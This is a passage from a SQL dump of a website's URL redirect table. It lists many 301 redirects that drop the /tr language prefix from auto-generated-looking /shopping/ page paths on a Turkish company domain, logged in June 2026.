00:00:00',301),(79342,'https://3s-technologies.com.tr/tr/shopping/mahomed/2173331575.html',NULL,'https://3s-technologies.com.tr/shopping/mahomed/2173331575.html','',1,0,'2026-06-11 22:26:47','0000-00-00 00:00:00',301),(79343,'https://3s-technologies.com.tr/tr/shopping/demoniacally/1205365756.html',NULL,'https://3s-technologies.com.tr/shopping/demoniacally/1205365756.html','',1,0,'2026-06-11 22:26:50','0000-00-00 00:00:00',301),(79344,'https://3s-technologies.com.tr/tr/shopping/bibliopegy/2862722507.html',NULL,'https://3s-technologies.com.tr/shopping/bibliopegy/2862722507.html','',1,0,'2026-06-11 22:26:53','0000-00-00 00:00:00',301),(79345,'https://3s-technologies.com.tr/tr/shopping/subordinance/1372247117.html',NULL,'https://3s-technologies.com.tr/shopping/subordinance/1372247117.html','',1,0,'2026-06-11 22:26:56','0000-00-00 00:00:00',301),(79346,'https://3s-technologies.com.tr/tr/shopping/autobiographist/4108301375.html',NULL,'https://3s-technologies.com.tr/shopping/autobiographist/4108301375.html','',1,0,'2026-06-11 22:26:59','0000-00-00 00:00:00',301),(79347,'https://3s-technologies.com.tr/tr/shopping/mammothrept/772515272.html',NULL,'https://3s-technologies.com.tr/shopping/mammothrept/772515272.html','',1,0,'2026-06-11 22:27:02','0000-00-00 00:00:00',301),(79348,'https://3s-technologies.com.tr/tr/shopping/carboxylate/2077010316.html',NULL,'https://3s-technologies.com.tr/shopping/carboxylate/2077010316.html','',1,0,'2026-06-11 22:27:05','0000-00-00 00:00:00',301),(79349,'https://3s-technologies.com.tr/tr/shopping/belched/1282634853.html',NULL,'https://3s-technologies.com.tr/shopping/belched/1282634853.html','',1,0,'2026-06-11 22:27:10','0000-00-00 00:00:00',301),(79350,'https://3s-technologies.com.tr/tr/shopping/unseasonableness/3107707357.html',NULL,'https://3s-technologies.com.tr/shopping/unseasonableness/3107707357.html','',1,0,'2026-06-11 22:27:12','0000-00-00 00:00:00',301),(79351,'https://3s-technologies.com.tr/tr/shopping/familisteries/3088535238.html',NULL,'https://3s-technologies.com.tr/shopping/familisteries/3088535238.html','',1,0,'2026-06-11 22:27:15','0000-00-00 00:00:00',301),(79352,'https://3s-technologies.com.tr/tr/shopping/poinciana/1063435816.html',NULL,'https://3s-technologies.com.tr/shopping/poinciana/1063435816.html','',1,0,'2026-06-11 22:27:18','0000-00-00 00:00:00',301),(79353,'https://3s-technologies.com.tr/tr/shopping/brotherinlaw/216718838.html',NULL,'https://3s-technologies.com.tr/shopping/brotherinlaw/216718838.html','',1,0,'2026-06-11 22:27:21','0000-00-00 00:00:00',301),(79354,'https://3s-technologies.com.tr/tr/shopping/womanlike/4059923171.html',NULL,'https://3s-technologies.com.tr/shopping/womanlike/4059923171.html','',1,0,'2026-06-11 22:27:24','0000-00-00 00:00:00',301),(79355,'https://3s-technologies.com.tr/tr/shopping/calcareoargillaceous/747031234.html',NULL,'https://3s-technologies.com.tr/shopping/calcareoargillaceous/747031234.html','',1,0,'2026-06-11 22:27:28','0000-00-00 00:00:00',301),(79356,'https://3s-technologies.com.tr/tr/shopping/bonapartist/1686135456.html',NULL,'https://3s-technologies.com.tr/shopping/bonapartist/1686135456.html','',1,0,'2026-06-11 22:27:30','0000-00-00 00:00:00',301),(79357,'https://3s-technologies.com.tr/tr/shopping/unbarricade/3268108349.html',NULL,'https://3s-technologies.com.tr/shopping/unbarricade/3268108349.html','',1,0,'2026-06-11 22:27:34','0000-00-00 00:00:00',301),(79358,'https://3s-technologies.com.tr/tr/shopping/whinny/2326445701.html',NULL,'https://3s-technologies.com.tr/shopping/whinny/2326445701.html','',1,0,'2026-06-11 22:27:37','0000-00-00 00:00:00',301),(79359,'https://3s-technologies.com.tr/tr/shopping/mawkish/4008915128.html',NULL,'https://3s-technologies.com.tr/shopping/mawkish/4008915128.html','',1,0,'2026-06-11 22:27:42','0000-00-00 00:00:00',301),(79360,'https://3s-technologies.com.tr/tr/shopping/alkekengi/2939613881.html',NULL,'https://3s-technologies.com.tr/shopping/alkekengi/2939613881.html','',1,0,'2026-06-11 22:27:47','0000-00-00 00:00:00',301),(79361,'https://3s-technologies.com.tr/tr/shopping/libertinage/2512630307.html',NULL,'https://3s-technologies.com.tr/shopping/libertinage/2512630307.html','',1,0,'2026-06-11 22:27:50','0000-00-00 00:00:00',301),(79362,'https://3s-technologies.com.tr/tr/shopping/disheartening/3883700711.html',NULL,'https://3s-technologies.com.tr/shopping/disheartening/3883700711.html','',1,0,'2026-06-11 22:27:53','0000-00-00 00:00:00',301),(79363,'https://3s-technologies.com.tr/tr/shopping/ichthyosauri/3274296987.html',NULL,'https://3s-technologies.com.tr/shopping/ichthyosauri/3274296987.html','',1,0,'2026-06-11 22:28:30','0000-00-00 00:00:00',301),(79364,'https://3s-technologies.com.tr/tr/shopping/immunization/3824503664.html',NULL,'https://3s-technologies.com.tr/shopping/immunization/3824503664.html','',1,0,'2026-06-11 22:29:06','0000-00-00 00:00:00',301),(79365,'https://3s-technologies.com.tr/tr/shopping/cornin/1667603754.html',NULL,'https://3s-technologies.com.tr/shopping/cornin/1667603754.html','',1,0,'2026-06-11 22:29:39','0000-00-00 00:00:00',301),(79366,'https://3s-technologies.com.tr/tr/shopping/prudentiality/322818191.html',NULL,'https://3s-technologies.com.tr/shopping/prudentiality/322818191.html','',1,0,'2026-06-11 22:31:41','0000-00-00 00:00:00',301),(79367,'https://3s-technologies.com.tr/tr/shopping/sylvae/2476589201.html',NULL,'https://3s-technologies.com.tr/shopping/sylvae/2476589201.html','',1,0,'2026-06-11 22:31:46','0000-00-00 00:00:00',301),(79368,'https://3s-technologies.com.tr/tr/shopping/outside/1192568971.html',NULL,'https://3s-technologies.com.tr/shopping/outside/1192568971.html','',1,0,'2026-06-11 22:32:26','0000-00-00 00:00:00',301),(79369,'https://3s-technologies.com.tr/tr/shopping/ciris/2486721914.html',NULL,'https://3s-technologies.com.tr/shopping/ciris/2486721914.html','',1,0,'2026-06-11 22:32:35','0000-00-00 00:00:00',301),(79370,'https://3s-technologies.com.tr/tr/shopping/touchpaper/3523519793.html',NULL,'https://3s-technologies.com.tr/shopping/touchpaper/3523519793.html','',1,0,'2026-06-11 22:33:16','0000-00-00 00:00:00',301),(79371,'https://3s-technologies.com.tr/tr/shopping/crackloo/3650192513.html',NULL,'https://3s-technologies.com.tr/shopping/crackloo/3650192513.html','',1,0,'2026-06-11 22:33:18','0000-00-00 00:00:00',301),(79372,'https://3s-technologies.com.tr/tr/shopping/opencut/732490312.html',NULL,'https://3s-technologies.com.tr/shopping/opencut/732490312.html','',1,0,'2026-06-11 22:33:31','0000-00-00 00:00:00',301),(79373,'https://3s-technologies.com.tr/tr/shopping/summary/2264285872.html',NULL,'https://3s-technologies.com.tr/shopping/summary/2264285872.html','',1,0,'2026-06-11 22:33:34','0000-00-00 00:00:00',301),(79374,'https://3s-technologies.com.tr/tr/shopping/cleronomy/2767508263.html',NULL,'https://3s-technologies.com.tr/shopping/cleronomy/2767508263.html','',1,0,'2026-06-11 22:34:19','0000-00-00 00:00:00',301),(79375,'https://3s-technologies.com.tr/tr/shopping/enroot/1717898727.html',NULL,'https://3s-technologies.com.tr/shopping/enroot/1717898727.html','',1,0,'2026-06-11 22:34:22','0000-00-00 00:00:00',301),(79376,'https://3s-technologies.com.tr/tr/shopping/priding/743575548.html',NULL,'https://3s-technologies.com.tr/shopping/priding/743575548.html','',1,0,'2026-06-11 22:35:39','0000-00-00 00:00:00',301),(79377,'https://3s-technologies.com.tr/tr/shopping/beadwork/2836995933.html',NULL,'https://3s-technologies.com.tr/shopping/beadwork/2836995933.html','',1,0,'2026-06-11 22:35:43','0000-00-00 00:00:00',301),(79378,'https://3s-technologies.com.tr/tr/shopping/forkedness/1268021035.html',NULL,'https://3s-technologies.com.tr/shopping/forkedness/1268021035.html','',1,0,'2026-06-11 22:36:26','0000-00-00 00:00:00',301),(79379,'https://3s-technologies.com.tr/tr/shopping/opsonation/59610078.html',NULL,'https://3s-technologies.com.tr/shopping/opsonation/59610078.html','',1,0,'2026-06-11 22:36:28','0000-00-00 00:00:00',301),(79380,'https://3s-technologies.com.tr/tr/shopping/lapidation/3524731876.html',NULL,'https://3s-technologies.com.tr/shopping/lapidation/3524731876.html','',1,0,'2026-06-11 22:36:31','0000-00-00 00:00:00',301),(79381,'https://3s-technologies.com.tr/tr/shopping/cardamon/979548544.html',NULL,'https://3s-technologies.com.tr/shopping/cardamon/979548544.html','',1,0,'2026-06-11 22:36:50','0000-00-00 00:00:00',301),(79382,'https://3s-technologies.com.tr/tr/shopping/omphalopter/796868102.html',NULL,'https://3s-technologies.com.tr/shopping/omphalopter/796868102.html','',1,0,'2026-06-11 22:37:17','0000-00-00 00:00:00',301),(79383,'https://3s-technologies.com.tr/tr/shopping/benzosol/3920685256.html',NULL,'https://3s-technologies.com.tr/shopping/benzosol/3920685256.html','',1,0,'2026-06-11 22:37:22','0000-00-00 00:00:00',301),(79384,'https://3s-technologies.com.tr/tr/shopping/suborder/133829449.html',NULL,'https://3s-technologies.com.tr/shopping/suborder/133829449.html','',1,0,'2026-06-11 22:37:25','0000-00-00 00:00:00',301),(79385,'https://3s-technologies.com.tr/tr/shopping/director/2898745321.html',NULL,'https://3s-technologies.com.tr/shopping/director/2898745321.html','',1,0,'2026-06-11 22:37:28','0000-00-00 00:00:00',301),(79386,'https://3s-technologies.com.tr/tr/shopping/cells/2296801291.html',NULL,'https://3s-technologies.com.tr/shopping/cells/2296801291.html','',1,0,'2026-06-11 22:37:31','0000-00-00 00:00:00',301),(79387,'https://3s-technologies.com.tr/tr/shopping/qualling/3645626882.html',NULL,'https://3s-technologies.com.tr/shopping/qualling/3645626882.html','',1,0,'2026-06-11 22:37:35','0000-00-00 00:00:00',301),(79388,'https://3s-technologies.com.tr/tr/shopping/tinseling/3669109869.html',NULL,'https://3s-technologies.com.tr/shopping/tinseling/3669109869.html','',1,0,'2026-06-11 22:37:38','0000-00-00 00:00:00',301),(79389,'https://3s-technologies.com.tr/tr/shopping/passable/2686371975.html',NULL,'https://3s-technologies.com.tr/shopping/passable/2686371975.html','',1,0,'2026-06-11 22:37:41','0000-00-00 00:00:00',301),(79390,'https://3s-technologies.com.tr/tr/shopping/thallic/932186535.html',NULL,'https://3s-technologies.com.tr/shopping/thallic/932186535.html','',1,0,'2026-06-11 22:37:44','0000-00-00 00:00:00',301),(79391,'https://3s-technologies.com.tr/tr/shopping/drops/3473806530.html',NULL,'https://3s-technologies.com.tr/shopping/drops/3473806530.html','',1,0,'2026-06-11 22:37:47','0000-00-00 00:00:00',301),(79392,'https://3s-technologies.com.tr/tr/shopping/overready/2861355412.html',NULL,'https://3s-technologies.com.tr/shopping/overready/2861355412.html','',1,0,'2026-06-11 22:38:06','0000-00-00 00:00:00',301),(79393,'https://3s-technologies.com.tr/tr/shopping/rovingly/738075514.html',NULL,'https://3s-technologies.com.tr/shopping/rovingly/738075514.html','',1,0,'2026-06-11 22:38:08','0000-00-00 00:00:00',301),(79394,'https://3s-technologies.com.tr/tr/shopping/leaflet/3054111577.html',NULL,'https://3s-technologies.com.tr/shopping/leaflet/3054111577.html','',1,0,'2026-06-11 22:38:11','0000-00-00 00:00:00',301),(79395,'https://3s-technologies.com.tr/tr/shopping/extortionate/1241932031.html',NULL,'https://3s-technologies.com.tr/shopping/extortionate/1241932031.html','',1,0,'2026-06-11 22:38:14','0000-00-00 00:00:00',301),(79396,'https://3s-technologies.com.tr/tr/shopping/thickknee/3975214534.html',NULL,'https://3s-technologies.com.tr/shopping/thickknee/3975214534.html','',1,0,'2026-06-11 22:38:17','0000-00-00 00:00:00',301),(79397,'https://3s-technologies.com.tr/tr/shopping/amuser/127865055.html',NULL,'https://3s-technologies.com.tr/shopping/amuser/127865055.html','',1,0,'2026-06-11 22:38:22','0000-00-00 00:00:00',301),(79398,'https://3s-technologies.com.tr/tr/shopping/pegroots/126652956.html',NULL,'https://3s-technologies.com.tr/shopping/pegroots/126652956.html','',1,0,'2026-06-11 22:38:25','0000-00-00 00:00:00',301),(79399,'https://3s-technologies.com.tr/tr/shopping/fallfish/1496421503.html',NULL,'https://3s-technologies.com.tr/shopping/fallfish/1496421503.html','',1,0,'2026-06-11 22:38:28','0000-00-00 00:00:00',301),(79400,'https://3s-technologies.com.tr/tr/shopping/periphrasing/1114374871.html',NULL,'https://3s-technologies.com.tr/shopping/periphrasing/1114374871.html','',1,0,'2026-06-11 22:38:31','0000-00-00 00:00:00',301),(79401,'https://3s-technologies.com.tr/tr/shopping/burlesquing/3592282167.html',NULL,'https://3s-technologies.com.tr/shopping/burlesquing/3592282167.html','',1,0,'2026-06-11 22:38:58','0000-00-00 00:00:00',301),(79402,'https://3s-technologies.com.tr/tr/shopping/evincible/3585480311.html',NULL,'https://3s-technologies.com.tr/shopping/evincible/3585480311.html','',1,0,'2026-06-11 22:39:00','0000-00-00 00:00:00',301),(79403,'https://3s-technologies.com.tr/tr/shopping/intoleration/710128200.html',NULL,'https://3s-technologies.com.tr/shopping/intoleration/710128200.html','',1,0,'2026-06-11 22:39:03','0000-00-00 00:00:00',301),(79404,'https://3s-technologies.com.tr/tr/shopping/brickbat/2363844153.html',NULL,'https://3s-technologies.com.tr/shopping/brickbat/2363844153.html','',1,0,'2026-06-11 22:39:06','0000-00-00 00:00:00',301),(79405,'https://3s-technologies.com.tr/tr/shopping/speechmaker/1567348467.html',NULL,'https://3s-technologies.com.tr/shopping/speechmaker/1567348467.html','',1,0,'2026-06-11 22:39:09','0000-00-00 00:00:00',301),(79406,'https://3s-technologies.com.tr/tr/shopping/ethidene/4014858772.html',NULL,'https://3s-technologies.com.tr/shopping/ethidene/4014858772.html','',1,0,'2026-06-11 22:39:17','0000-00-00 00:00:00',301),(79407,'https://3s-technologies.com.tr/tr/shopping/reactive/3361341668.html',NULL,'https://3s-technologies.com.tr/shopping/reactive/3361341668.html','',1,0,'2026-06-11 22:39:21','0000-00-00 00:00:00',301),(79408,'https://3s-technologies.com.tr/tr/shopping/weakkneed/2385951534.html',NULL,'https://3s-technologies.com.tr/shopping/weakkneed/2385951534.html','',1,0,'2026-06-11 22:39:24','0000-00-00 00:00:00',301),(79409,'https://3s-technologies.com.tr/tr/shopping/proctitis/3867267645.html',NULL,'https://3s-technologies.com.tr/shopping/proctitis/3867267645.html','',1,0,'2026-06-11 22:39:27','0000-00-00 00:00:00',301),(79410,'https://3s-technologies.com.tr/tr/shopping/burnable/1177033165.html',NULL,'https://3s-technologies.com.tr/shopping/burnable/1177033165.html','',1,0,'2026-06-11 22:39:34','0000-00-00 00:00:00',301),(79411,'https://3s-technologies.com.tr/tr/shopping/acrogenic/476719086.html',NULL,'https://3s-technologies.com.tr/shopping/acrogenic/476719086.html','',1,0,'2026-06-11 22:39:36','0000-00-00 00:00:00',301),(79412,'https://3s-technologies.com.tr/tr/shopping/nauseation/1297928155.html',NULL,'https://3s-technologies.com.tr/shopping/nauseation/1297928155.html','',1,0,'2026-06-11 22:39:40','0000-00-00 00:00:00',301),(79413,'https://3s-technologies.com.tr/tr/shopping/klamaths/4011482083.html',NULL,'https://3s-technologies.com.tr/shopping/klamaths/4011482083.html','',1,0,'2026-06-11 22:39:42','0000-00-00 00:00:00',301),(79414,'https://3s-technologies.com.tr/tr/shopping/cuckoos/3190273014.html',NULL,'https://3s-technologies.com.tr/shopping/cuckoos/3190273014.html','',1,0,'2026-06-11 22:40:06','0000-00-00 00:00:00',301),(79415,'https://3s-technologies.com.tr/tr/shopping/chamfered/2823359446.html',NULL,'https://3s-technologies.com.tr/shopping/chamfered/2823359446.html','',1,0,'2026-06-11 22:40:09','0000-00-00 00:00:00',301),(79416,'https://3s-technologies.com.tr/tr/shopping/contemner/4000698604.html',NULL,'https://3s-technologies.com.tr/shopping/contemner/4000698604.html','',1,0,'2026-06-11 22:40:12','0000-00-00 00:00:00',301),(79417,'https://3s-technologies.com.tr/tr/shopping/coverpoint/2321349154.html',NULL,'https://3s-technologies.com.tr/shopping/coverpoint/2321349154.html','',1,0,'2026-06-11 22:40:15','0000-00-00 00:00:00',301),(79418,'https://3s-technologies.com.tr/tr/shopping/phono/470918183.html',NULL,'https://3s-technologies.com.tr/shopping/phono/470918183.html','',1,0,'2026-06-11 22:40:20','0000-00-00 00:00:00',301),(79419,'https://3s-technologies.com.tr/tr/shopping/compositive/4142488860.html',NULL,'https://3s-technologies.com.tr/shopping/compositive/4142488860.html','',1,0,'2026-06-11 22:40:22','0000-00-00 00:00:00',301),(79420,'https://3s-technologies.com.tr/tr/shopping/blubbered/3696592775.html',NULL,'https://3s-technologies.com.tr/shopping/blubbered/3696592775.html','',1,0,'2026-06-11 22:40:25','0000-00-00 00:00:00',301),(79421,'https://3s-technologies.com.tr/tr/shopping/commiserated/1682154907.html',NULL,'https://3s-technologies.com.tr/shopping/commiserated/1682154907.html','',1,0,'2026-06-11 22:40:28','0000-00-00 00:00:00',301),(79422,'https://3s-technologies.com.tr/tr/shopping/laparotomy/3071984041.html',NULL,'https://3s-technologies.com.tr/shopping/laparotomy/3071984041.html','',1,0,'2026-06-11 22:40:40','0000-00-00 00:00:00',301),(79423,'https://3s-technologies.com.tr/tr/shopping/frothless/3366635142.html',NULL,'https://3s-technologies.com.tr/shopping/frothless/3366635142.html','',1,0,'2026-06-11 22:40:42','0000-00-00 00:00:00',301),(79424,'https://3s-technologies.com.tr/tr/shopping/perce/3288758896.html',NULL,'https://3s-technologies.com.tr/shopping/perce/3288758896.html','',1,0,'2026-06-11 22:40:45','0000-00-00 00:00:00',301),(79425,'https://3s-technologies.com.tr/tr/shopping/dapple/3176131126.html',NULL,'https://3s-technologies.com.tr/shopping/dapple/3176131126.html','',1,0,'2026-06-11 22:40:48','0000-00-00 00:00:00',301),(79426,'https://3s-technologies.com.tr/tr/shopping/induplicative/3852173266.html',NULL,'https://3s-technologies.com.tr/shopping/induplicative/3852173266.html','',1,0,'2026-06-11 22:41:37','0000-00-00 00:00:00',301),(79427,'https://3s-technologies.com.tr/tr/shopping/doubledealing/2534658675.html',NULL,'https://3s-technologies.com.tr/shopping/doubledealing/2534658675.html','',1,0,'2026-06-11 22:41:39','0000-00-00 00:00:00',301),(79428,'https://3s-technologies.com.tr/tr/shopping/persuading/820239711.html',NULL,'https://3s-technologies.com.tr/shopping/persuading/820239711.html','',1,0,'2026-06-11 22:41:42','0000-00-00 00:00:00',301),(79429,'https://3s-technologies.com.tr/tr/shopping/tacker/1578902634.html',NULL,'https://3s-technologies.com.tr/shopping/tacker/1578902634.html','',1,0,'2026-06-11 22:41:45','0000-00-00 00:00:00',301),(79430,'https://3s-technologies.com.tr/tr/shopping/easygoingezygoing/1781845118.html',NULL,'https://3s-technologies.com.tr/shopping/easygoingezygoing/1781845118.html','',1,0,'2026-06-11 22:41:52','0000-00-00 00:00:00',301),(79431,'https://3s-technologies.com.tr/tr/shopping/glory/2247979394.html',NULL,'https://3s-technologies.com.tr/shopping/glory/2247979394.html','',1,0,'2026-06-11 22:41:55','0000-00-00 00:00:00',301),(79432,'https://3s-technologies.com.tr/tr/shopping/soundable/695033837.html',NULL,'https://3s-technologies.com.tr/shopping/soundable/695033837.html','',1,0,'2026-06-11 22:41:58','0000-00-00 00:00:00',301),(79433,'https://3s-technologies.com.tr/tr/shopping/clearheaded/1197157759.html',NULL,'https://3s-technologies.com.tr/shopping/clearheaded/1197157759.html','',1,0,'2026-06-11 22:42:01','0000-00-00 00:00:00',301),(79434,'https://3s-technologies.com.tr/tr/shopping/coolant/4237458369.html',NULL,'https://3s-technologies.com.tr/shopping/coolant/4237458369.html','',1,0,'2026-06-11 22:42:11','0000-00-00 00:00:00',301),(79435,'https://3s-technologies.com.tr/tr/shopping/ruficeps/3901536310.html',NULL,'https://3s-technologies.com.tr/shopping/ruficeps/3901536310.html','',1,0,'2026-06-11 22:42:14','0000-00-00 00:00:00',301),(79436,'https://3s-technologies.com.tr/tr/shopping/spirograph/2516187607.html',NULL,'https://3s-technologies.com.tr/shopping/spirograph/2516187607.html','',1,0,'2026-06-11 22:42:17','0000-00-00 00:00:00',301),(79437,'https://3s-technologies.com.tr/tr/shopping/thurrok/352629210.html',NULL,'https://3s-technologies.com.tr/shopping/thurrok/352629210.html','',1,0,'2026-06-11 22:42:20','0000-00-00 00:00:00',301),(79438,'https://3s-technologies.com.tr/tr/shopping/bagwig/351676735.html',NULL,'https://3s-technologies.com.tr/shopping/bagwig/351676735.html','',1,0,'2026-06-11 22:42:36','0000-00-00 00:00:00',301),(79439,'https://3s-technologies.com.tr/tr/shopping/pells/1666932834.html',NULL,'https://3s-technologies.com.tr/shopping/pells/1666932834.html','',1,0,'2026-06-11 22:42:38','0000-00-00 00:00:00',301),(79440,'https://3s-technologies.com.tr/tr/shopping/conceptible/2188606565.html',NULL,'https://3s-technologies.com.tr/shopping/conceptible/2188606565.html','',1,0,'2026-06-11 22:42:42','0000-00-00 00:00:00',301),(79441,'https://3s-technologies.com.tr/tr/shopping/bilberry/971371050.html',NULL,'https://3s-technologies.com.tr/shopping/bilberry/971371050.html','',1,0,'2026-06-11 22:42:44','0000-00-00 00:00:00',301),(79442,'https://3s-technologies.com.tr/tr/shopping/yaffler/533274752.html',NULL,'https://3s-technologies.com.tr/shopping/yaffler/533274752.html','',1,0,'2026-06-11 22:42:49','0000-00-00 00:00:00',301),(79443,'https://3s-technologies.com.tr/tr/shopping/stonecold/4278478213.html',NULL,'https://3s-technologies.com.tr/shopping/stonecold/4278478213.html','',1,0,'2026-06-11 22:42:51','0000-00-00 00:00:00',301),(79444,'https://3s-technologies.com.tr/tr/shopping/ilial/3827459884.html',NULL,'https://3s-technologies.com.tr/shopping/ilial/3827459884.html','',1,0,'2026-06-11 22:42:54','0000-00-00 00:00:00',301),(79445,'https://3s-technologies.com.tr/tr/shopping/comenic/3621747860.html',NULL,'https://3s-technologies.com.tr/shopping/comenic/3621747860.html','',1,0,'2026-06-11 22:42:57','0000-00-00 00:00:00',301),(79446,'https://3s-technologies.com.tr/tr/shopping/aplomb/3829608216.html',NULL,'https://3s-technologies.com.tr/shopping/aplomb/3829608216.html','',1,0,'2026-06-11 22:43:23','0000-00-00 00:00:00',301),(79447,'https://3s-technologies.com.tr/tr/shopping/recommence/195001439.html',NULL,'https://3s-technologies.com.tr/shopping/recommence/195001439.html','',1,0,'2026-06-11 22:43:26','0000-00-00 00:00:00',301),(79448,'https://3s-technologies.com.tr/tr/shopping/costotome/960631172.html',NULL,'https://3s-technologies.com.tr/shopping/costotome/960631172.html','',1,0,'2026-06-11 22:43:29','0000-00-00 00:00:00',301),(79449,'https://3s-technologies.com.tr/tr/shopping/voyage/333921515.html',NULL,'https://3s-technologies.com.tr/shopping/voyage/333921515.html','',1,0,'2026-06-11 22:43:32','0000-00-00 00:00:00',301),(79450,'https://3s-technologies.com.tr/tr/shopping/barrelled/234455474.html',NULL,'https://3s-technologies.com.tr/shopping/barrelled/234455474.html','',1,0,'2026-06-11 22:43:43','0000-00-00 00:00:00',301),(79451,'https://3s-technologies.com.tr/tr/shopping/perisystole/1055083432.html',NULL,'https://3s-technologies.com.tr/shopping/perisystole/1055083432.html','',1,0,'2026-06-11 22:43:45','0000-00-00 00:00:00',301),(79452,'https://3s-technologies.com.tr/tr/shopping/outbuilt/1396699667.html',NULL,'https://3s-technologies.com.tr/shopping/outbuilt/1396699667.html','',1,0,'2026-06-11 22:43:48','0000-00-00 00:00:00',301),(79453,'https://3s-technologies.com.tr/tr/shopping/interstapedial/870171876.html',NULL,'https://3s-technologies.com.tr/shopping/interstapedial/870171876.html','',1,0,'2026-06-11 22:43:51','0000-00-00 00:00:00',301),(79454,'https://3s-technologies.com.tr/tr/shopping/ungain/805959605.html',NULL,'https://3s-technologies.com.tr/shopping/ungain/805959605.html','',1,0,'2026-06-11 22:44:10','0000-00-00 00:00:00',301),(79455,'https://3s-technologies.com.tr/tr/shopping/galeata/3868129525.html',NULL,'https://3s-technologies.com.tr/shopping/galeata/3868129525.html','',1,0,'2026-06-11 22:44:12','0000-00-00 00:00:00',301),(79456,'https://3s-technologies.com.tr/tr/shopping/euphemia/2506659828.html',NULL,'https://3s-technologies.com.tr/shopping/euphemia/2506659828.html','',1,0,'2026-06-11 22:44:15','0000-00-00 00:00:00',301),(79457,'https://3s-technologies.com.tr/tr/shopping/regenesis/4017259813.html',NULL,'https://3s-technologies.com.tr/shopping/regenesis/4017259813.html','',1,0,'2026-06-11 22:44:18','0000-00-00 00:00:00',301),(79458,'https://3s-technologies.com.tr/tr/shopping/residence/4063082661.html',NULL,'https://3s-technologies.com.tr/shopping/residence/4063082661.html','',1,0,'2026-06-11 22:44:23','0000-00-00 00:00:00',301),(79459,'https://3s-technologies.com.tr/tr/shopping/revealer/2613790669.html',NULL,'https://3s-technologies.com.tr/shopping/revealer/2613790669.html','',1,0,'2026-06-11 22:44:25','0000-00-00 00:00:00',301),(79460,'https://3s-technologies.com.tr/tr/shopping/crumenifer/2733356245.html',NULL,'https://3s-technologies.com.tr/shopping/crumenifer/2733356245.html','',1,0,'2026-06-11 22:44:28','0000-00-00 00:00:00',301),(79461,'https://3s-technologies.com.tr/tr/shopping/coloboma/526538882.html',NULL,'https://3s-technologies.com.tr/shopping/coloboma/526538882.html','',1,0,'2026-06-11 22:44:31','0000-00-00 00:00:00',301),(79462,'https://3s-technologies.com.tr/tr/shopping/origan/3171001175.html',NULL,'https://3s-technologies.com.tr/shopping/origan/3171001175.html','',1,0,'2026-06-11 22:44:39','0000-00-00 00:00:00',301),(79463,'https://3s-technologies.com.tr/tr/shopping/approachable/1720794914.html',NULL,'https://3s-technologies.com.tr/shopping/approachable/1720794914.html','',1,0,'2026-06-11 22:44:41','0000-00-00 00:00:00',301),(79464,'https://3s-technologies.com.tr/tr/shopping/unrespect/2456464607.html',NULL,'https://3s-technologies.com.tr/shopping/unrespect/2456464607.html','',1,0,'2026-06-11 22:44:45','0000-00-00 00:00:00',301),(79465,'https://3s-technologies.com.tr/tr/shopping/unbend/1164774296.html',NULL,'https://3s-technologies.com.tr/shopping/unbend/1164774296.html','',1,0,'2026-06-11 22:44:48','0000-00-00 00:00:00',301),(79466,'https://3s-technologies.com.tr/tr/shopping/surliness/2134893956.html',NULL,'https://3s-technologies.com.tr/shopping/surliness/2134893956.html','',1,0,'2026-06-11 22:45:07','0000-00-00 00:00:00',301),(79467,'https://3s-technologies.com.tr/tr/shopping/amyris/2473212512.html',NULL,'https://3s-technologies.com.tr/shopping/amyris/2473212512.html','',1,0,'2026-06-11 22:45:10','0000-00-00 00:00:00',301),(79468,'https://3s-technologies.com.tr/tr/shopping/instrumentally/3770771225.html',NULL,'https://3s-technologies.com.tr/shopping/instrumentally/3770771225.html','',1,0,'2026-06-11 22:45:13','0000-00-00 00:00:00',301),(79469,'https://3s-technologies.com.tr/tr/shopping/desponsories/3224140200.html',NULL,'https://3s-technologies.com.tr/shopping/desponsories/3224140200.html','',1,0,'2026-06-11 22:45:16','0000-00-00 00:00:00',301),(79470,'https://3s-technologies.com.tr/tr/shopping/deploitation/2424267840.html',NULL,'https://3s-technologies.com.tr/shopping/deploitation/2424267840.html','',1,0,'2026-06-11 22:45:40','0000-00-00 00:00:00',301),(79471,'https://3s-technologies.com.tr/tr/shopping/batatas/1157163302.html',NULL,'https://3s-technologies.com.tr/shopping/batatas/1157163302.html','',1,0,'2026-06-11 22:45:42','0000-00-00 00:00:00',301),(79472,'https://3s-technologies.com.tr/tr/shopping/gafftopsail/2047449368.html',NULL,'https://3s-technologies.com.tr/shopping/gafftopsail/2047449368.html','',1,0,'2026-06-11 22:45:45','0000-00-00 00:00:00',301),(79473,'https://3s-technologies.com.tr/tr/shopping/shrug/3542505216.html',NULL,'https://3s-technologies.com.tr/shopping/shrug/3542505216.html','',1,0,'2026-06-11 22:45:48','0000-00-00 00:00:00',301),(79474,'https://3s-technologies.com.tr/tr/shopping/quarterage/826512571.html',NULL,'https://3s-technologies.com.tr/shopping/quarterage/826512571.html','',1,0,'2026-06-11 22:46:03','0000-00-00 00:00:00',301),(79475,'https://3s-technologies.com.tr/tr/shopping/pined/3655638901.html',NULL,'https://3s-technologies.com.tr/shopping/pined/3655638901.html','',1,0,'2026-06-11 22:46:05','0000-00-00 00:00:00',301),(79476,'https://3s-technologies.com.tr/tr/shopping/uncontrollably/2795623655.html',NULL,'https://3s-technologies.com.tr/shopping/uncontrollably/2795623655.html','',1,0,'2026-06-11 22:46:08','0000-00-00 00:00:00',301),(79477,'https://3s-technologies.com.tr/tr/shopping/nebraskan/1303187863.html',NULL,'https://3s-technologies.com.tr/shopping/nebraskan/1303187863.html','',1,0,'2026-06-11 22:46:11','0000-00-00 00:00:00',301),(79478,'https://3s-technologies.com.tr/tr/shopping/organist/1065618352.html',NULL,'https://3s-technologies.com.tr/shopping/organist/1065618352.html','',1,0,'2026-06-11 22:46:21','0000-00-00 00:00:00',301),(79479,'https://3s-technologies.com.tr/tr/shopping/brightening/3997142134.html',NULL,'https://3s-technologies.com.tr/shopping/brightening/3997142134.html','',1,0,'2026-06-11 22:46:24','0000-00-00 00:00:00',301),(79480,'https://3s-technologies.com.tr/tr/shopping/housage/3185732675.html',NULL,'https://3s-technologies.com.tr/shopping/housage/3185732675.html','',1,0,'2026-06-11 22:46:27','0000-00-00 00:00:00',301),(79481,'https://3s-technologies.com.tr/tr/shopping/monotreme/1554708848.html',NULL,'https://3s-technologies.com.tr/shopping/monotreme/1554708848.html','',1,0,'2026-06-11 22:46:30','0000-00-00 00:00:00',301),(79482,'https://3s-technologies.com.tr/tr/shopping/orthognathic/2249437286.html',NULL,'https://3s-technologies.com.tr/shopping/orthognathic/2249437286.html','',1,0,'2026-06-11 22:46:36','0000-00-00 